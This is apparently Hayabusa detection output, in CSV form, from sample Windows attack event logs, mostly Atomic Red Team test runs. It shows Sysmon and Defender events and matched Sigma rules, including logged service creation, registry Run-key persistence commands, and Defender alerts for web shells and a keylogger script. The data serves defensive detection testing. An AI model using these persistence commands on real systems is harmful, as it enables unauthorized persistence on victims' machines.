2019-07-04 05:39:31.707 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:8181 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T | Severity: Severe | Type: Backdoor | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA21C70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5828 | PGUID: 747F3D96-D6EB-5D31-0000-0010E0252500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 3764 | PGUID: 747F3D96-D6ED-5D31-0000-0010C88A2500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:43:46.623 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\phvj2yfb\phvj2yfb.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:43:46.623 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4216 | PGUID: 747F3D96-D738-5D31-0000-001046A02600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | LID: 0x50951 | PID: 1700 | PGUID: 747F3D96-D738-5D31-0000-001098A22600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,Persis | PrivEsc,New Service Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2556 | PGUID: 747F3D96-D738-5D31-0000-001056A62600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe start AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D738-5D31-0000-0010D8AA2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6188 | PGUID: 747F3D96-D738-5D31-0000-00105CAC2600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D739-5D31-0000-00104CB72600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe stop AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D739-5D31-0000-0010B6B92600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,../hayabusa-rules/sigma/process_creation/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4744 | PGUID: 747F3D96-D739-5D31-0000-0010E4BB2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe delete AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D739-5D31-0000-001046BE2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D739-5D31-0000-0010B2C22600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5348 | PGUID: 747F3D96-D750-5D31-0000-0010B9F82600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-D765-5D31-0000-001027B72800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | LID: 0x50951 | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team: C:\Path\AtomicRedTeam.exe | Process: C:\Windows\system32\reg.exe | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5824 | PGUID: 747F3D96-D765-5D31-0000-0010D7BD2800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | LID: 0x50951 | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team | Process: C:\Windows\system32\reg.exe | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4264 | PGUID: 747F3D96-D765-5D31-0000-001024C32800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D772-5D31-0000-0010BEE52800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | LID: 0x50951 | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1: C:\Path\AtomicRedTeam.dll | Process: C:\Windows\system32\reg.exe | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6472 | PGUID: 747F3D96-D772-5D31-0000-001031EB2800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | LID: 0x50951 | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1 | Process: C:\Windows\system32\reg.exe | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D772-5D31-0000-00107CF02800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
